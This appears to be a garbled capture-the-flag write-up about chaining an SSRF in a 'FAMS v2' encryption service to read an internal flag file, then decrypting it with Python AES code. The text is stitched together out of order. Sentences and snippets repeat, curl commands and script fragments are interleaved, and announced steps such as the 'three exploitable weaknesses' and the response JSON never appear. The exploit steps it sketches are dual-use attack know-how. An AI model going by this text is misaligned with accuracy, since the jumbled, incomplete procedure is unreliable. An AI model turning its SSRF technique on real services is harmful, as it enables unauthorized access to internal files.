By abusing the SSRF to read the internal flag file, then using the deterministic encryption routine to decrypt it (the service returns the ciphertext and the key it used), we can recover the flag. 2.1. Basic browsing $ curl -s http://v2.fams.cc Result – a tiny HTML page:
# Load encrypted file data = open('enc.bin','rb').read() iv, ct = data[:16], data[16:]
<!doctype html> <html> <head><title>FAMS v2 – File‑and‑Message Service</title></head> <body> <h1>Welcome to FAMS v2</h1> <form action="/encrypt" method="POST"> <label>URL: <input type="text" name="url"></label><br> <label>Key: <input type="text" name="key"></label><br> <input type="submit" value="Encrypt"> </form> <p>Download your encrypted file at: <a id="dl" href=""></a></p> </body> </html> No obvious hints. The /encrypt endpoint is the only POST target. Using Burp Suite (or curl -v ), we send a dummy request: v2.fams.cc
# 2️⃣ Pull the encrypted blob curl -s "$DOWNLOAD" -o /tmp/enc.bin
#!/usr/bin/env python3 import sys, hashlib, binascii from Crypto.Cipher import AES By abusing the SSRF to read the internal
At first glance the service looks harmless, but a closer look reveals three exploitable weaknesses that can be chained together:
curl -v -X POST http://v2.fams.cc/encrypt \ -d "url=http://example.com&key=testkey" The response JSON: The /encrypt endpoint is the only POST target
# Remove PKCS#7 padding pad_len = pt[-1] flag = pt[:-pad_len].decode() print(flag) Running it yields: